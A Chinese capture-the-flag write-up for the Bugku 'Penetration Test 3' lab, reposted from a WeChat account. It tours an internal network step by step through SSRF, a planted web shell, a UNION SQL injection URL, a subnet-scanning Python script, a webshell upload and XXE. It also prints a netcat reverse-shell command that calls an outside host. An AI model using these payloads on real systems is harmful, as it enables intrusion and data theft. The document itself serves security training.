Bugku 渗透测试3 通关详解

admin 2022年10月29日17:50:45评论271 views字数 901阅读3分0秒阅读模式

外网

题目给了一个登录框,用于获取站点快照,存在SSRF,直接读flag


Bugku 渗透测试3 通关详解

访问host文件,得到本机ip


Bugku 渗透测试3 通关详解

对192.168.0/24网段爆破,爆破结果如下

Bugku 渗透测试3 通关详解


192.168.0.10

其中192.168.0.10是被黑的网页:


Bugku 渗透测试3 通关详解

Bugku 渗透测试3 通关详解

盲猜shell.php


Bugku 渗透测试3 通关详解

直接读根目录flag即可:


  • http://192.168.0.10/shell.php?cmd=cat /f*

Bugku 渗透测试3 通关详解

发现当前目录也存在一个flag


Bugku 渗透测试3 通关详解

直接读即可


Bugku 渗透测试3 通关详解

题目存在nc

Bugku 渗透测试3 通关详解

使用nc弹shell,注意不存在bash,要用sh

http://192.168.0.10/shell.php?cmd=nc 1.1.1.1 7777 -e /bin/sh

Bugku 渗透测试3 通关详解


192.168.0.138

内网探测到192.168.0.138,存在联合注入,payload如下

http://192.168.0.138?id=100%20union%20select%201,2,3,(select%20*%20from%20bugku_sql.flag)--+

Bugku 渗透测试3 通关详解

10.10.0.22

由于fscan出了点问题,写了个python脚本跑了一下10.10.0/24网段:

import requests
for i in range(1,256): url = "http://10.10.0." + str(i) try: r = requests.get(url) except: continue else: if r.status_code == 200: print(url)

Bugku 渗透测试3 通关详解

还存在10.10.0.22这台机子


Bugku 渗透测试3 通关详解

访问后台admin.php,账号密码都是admin 后台有一个文件上传的功能,没有过滤,直接上传一句话木马连接即可:


Bugku 渗透测试3 通关详解

同样也是存在两个flag 一个在网站目录


Bugku 渗透测试3 通关详解

一个在根目录

Bugku 渗透测试3 通关详解


192.168.0.250

内网192.168.0.250是一个登录页面


Bugku 渗透测试3 通关详解

存在xxe漏洞 直接读flag接口


Bugku 渗透测试3 通关详解

根据前一题的经验,在/var/www/html下可能还存在一个flag

Bugku 渗透测试3 通关详解

本文章仅用于信息安全技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循法律法规。

未经作者允许,严禁转载   如有转载:请在公众号下留言


原文始发于微信公众号(7coinSec):Bugku 渗透测试3 通关详解

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月29日17:50:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Bugku 渗透测试3 通关详解http://cn-sec.com/archives/1363837.html

发表评论

匿名网友 填写信息